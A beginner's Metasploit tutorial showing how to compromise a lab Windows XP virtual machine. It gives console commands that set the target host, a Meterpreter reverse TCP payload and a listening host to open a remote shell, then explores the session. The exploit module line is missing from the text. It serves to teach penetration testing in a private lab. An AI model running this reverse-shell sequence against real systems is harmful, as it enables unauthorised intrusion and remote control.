This is beta version of article By Jordan M. Bonagura, if you have some questions or comments, contact with [email protected]
When I decided to write this article, I thought of working with a model without a lot of theory and much more hands-on. The goal is to write for a beginner audience that wants to know how to hack a system, but don’t have any idea how to do it.
I’m sure that usually an article must have all technical stuffs to prove why it’s possible and more than that, teaching what happens in each step, but in this case I chose write something for that guy that wants to hack for the first time, so, in my opinion, this guy can be motivated to learn more and more and start to discovery a new hacking world.
I have to emphasize here the importance that any kind of test should be perfoming in your own environment with your virtual machines and always for ethical purposes.
So, let’s talk about our environment:
We’ll use 2 different virtual machines that will have these configurations bellow:
O.S. IP Address
Windows XP 192.168.0.100
With the right environment, we can go to the next step.
Using the Backtrack machine, we can start the Metasploit application using the msfconsole command.
Before we start to hack, we can see some interesting commands, for example the version that we are using with the version command in the metasploit prompt, and get some help with help command.
To see the exploits and know more about each one, you can run the show exploits command inside the metasploit prompt.
Environment 1 ! Windows XP
set RHOST 192.168.0.100
set target 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
After running the exploit there will be an open session where you can type the pwd command and check what that you are inside the C:WindowsSystem32, another command that can be used is sysinfo to show you detailed informations about the O.S. Now that you've learned how to hack the Windows XP, you need to go deeper and begin to understand how these exploits really works and how they use technical skills to explore vulnerabilities. You can try to understand some concepts of computer networks and operating systems too. Remember only studying concepts you will be really able to succeed in your hacking strategies.
In my next article I will show how to explore a Linux O.S. using metasploit.